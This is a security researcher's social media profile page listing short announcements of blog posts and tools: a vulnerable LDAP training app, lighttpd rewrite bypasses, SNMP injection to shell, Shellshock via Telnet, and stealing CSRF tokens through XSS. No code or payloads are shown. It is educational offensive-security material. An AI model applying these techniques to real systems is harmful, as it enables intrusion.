Profile cover photo
Profile photo
Robin Wood
722 followers -
Hacking, Coding and Climbing
Hacking, Coding and Climbing

722 followers
About
Posts

Post has attachment
New blog post and sample code, defending against XSS attacks through SVG files.

https://digi.ninja/blog/svg_xss.php
Add a comment...

Post has attachment
I've just released a new project, vuLnDAP, a vulnerable web app that uses LDAP as a backend. By chaining a couple of vulnerabilities together you can acquire the keys to the kingdom.

The project was inspired by Adrien de Beaupre as he said we would like something like this for his SANS 642 class. I've not done any work with either LDAP or Golang before so any feedback is welcome.

The project homepage is https://digi.ninja/projects/vulndap.php and if you get stuck I've written a blog post with a walkthrough covering the way I would get the data out.
Add a comment...

Post has attachment
New blog post about bypassing rewrite rules in lighttpd using bad HTTP requests.

https://digi.ninja/blog/lighttpd_rewrite_bypass.php
Add a comment...

Post has attachment
New blog post, going from SNMP config file injection to remote shell.

https://digi.ninja/blog/snmp_to_shell.php
Add a comment...

Post has attachment
New blog post, a walk through of using Burp Suite macros and the session handler.

https://digi.ninja/blog/burp_macros.php
Add a comment...

Post has attachment
New blog post, Shellshock and the Telnet USER variable

https://digi.ninja/blog/telnet_shellshock.php

Nothing new, just documenting how to exploit it as I couldn't find info out there
Add a comment...

Post has attachment
New blog post, defeating Cross-Site Request Forgery tokens using Cross-Site Scripting

https://digi.ninja/blog/xss_steal_csrf_token.php
Add a comment...

Post has attachment
A new blog post talking about how a common web application mutual authentication technique often used by banks can be easily bypassed.
Add a comment...

Post has attachment
New tool, Sitediff. Use a local copy of a set of files to fingerprint what framework an app is using.

https://digi.ninja/projects/sitediff.php
Add a comment...

Post has attachment
Add a comment...
Wait while more posts are being loaded